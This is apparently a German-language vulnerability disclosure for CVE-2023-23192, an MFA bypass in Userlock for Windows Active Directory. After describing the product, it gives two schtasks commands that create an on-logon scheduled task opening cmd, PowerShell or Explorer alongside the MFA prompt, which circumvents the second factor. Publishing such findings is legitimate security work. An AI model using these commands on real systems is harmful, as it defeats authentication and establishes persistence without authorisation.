
CVE-2023-23192
Beschreibung: Userlock ist eine Multi-Faktor-Authentifizierungslösung für Windows Active Directory & Cloud-Umgebungen, um unbefugten und unerwünschten Zugriff zu verhindern. Es ermöglicht maßgeschneiderte Zwei-Faktor-Authentifizierung (2FA) bei Windows-Anmeldung, Remote Desktop (RDP & RD Gateway), IIS, VPN und Cloud-Anwendungen. Userlock ermöglicht es Ihnen, MFA für Ihre Active Directory-Anmeldungen auf domänengebundenen Arbeitsstationen und Servern zu implementieren. Ein Dialogfeld wird angezeigt, in dem Sie den OTP-Code aus der Authenticator-App bei der ersten Anmeldung des Tages an ihrer Arbeitsstation eingeben können. Userlock integriert sich in den Anmeldeprozess, um eine Zwei-Faktor-Authentifizierung zu liefern.
Eine der am häufigsten ausgenutzten Strategien von Bedrohungsakteuren, um Persistenz auf dem Computer eines Opfers aufzubauen, ist die Aufgabenplanung. Der Gegner nutzt diese Strategie häufig, um automatisierte Erkennung zu umgehen, Persistenz aufrechtzuerhalten und nach langen Phasen der Zurückhaltung Überraschungsangriffe durchzuführen.
Sicherheitslücke:
Erstellen Sie einen geplanten Task, der nach der Anmeldung eines beliebigen Benutzers ausgeführt wird.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"

Nach erfolgreicher Anmeldung mit den Domänenanmeldeinformationen wird eine geplante cmd.exe zusammen mit dem Userlock-MFA-Dialogfeld angezeigt.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"